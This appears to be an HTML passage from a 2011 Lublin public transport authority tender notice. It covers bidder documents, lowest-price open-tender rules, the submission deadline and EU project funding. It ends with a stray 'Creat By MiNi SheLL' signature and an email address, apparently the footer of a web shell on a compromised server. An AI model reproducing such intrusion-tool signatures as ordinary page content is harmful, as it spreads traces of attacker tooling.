3. Oświadczenie o części, której wykonanie, wykonawca zamierza powierzyć podwykonawcom wg Załącznik nr 5 do s.i.w.z. w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom.
4.  Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp  (dotyczy także wspólników spółki cywilnej). Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest  uprawniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, jak również wskazywać ustanowionego pełnomocnika.
5 Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentopwania wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub wykonawca- w przypadku osób fizycznych 
6. Pełnomocnictwo o którym mowa w pkt. 4 i 5 powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez osoby wystawiające pełnomocnictwo, notariusza lub osoby, których uprawnienie do reprezentacji wynika z dokumentu rejstracyjnego wykonawcy, zgodnie ze sposobem reprezentacji określonym w tych dokumentach.
7. Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby o których mowa w art. 24 ust. 1 pkt 5-8 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z tym że  w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń- zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany zostały zawarte w specyfikacji istotnych warunków zamówienia- Załącznik nr 7 do s.i,w.z- Wzór umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ztm.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Transportu Miejskiego w Lublinie, Al. Kraśnicka 25, 20-718 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2011 godzina 09:00, miejsce: Zarząd Transportu Miejskiego w Lublinie, Al. Kraśnicka 25, 20-718 lublin, pok. 102 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Modernizacja infrastruktury przystankowej wraz z budową systemu informacji pasażerskiej dla poprawy jakości funkcjonowania komunikacji miejskiej w Lublinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com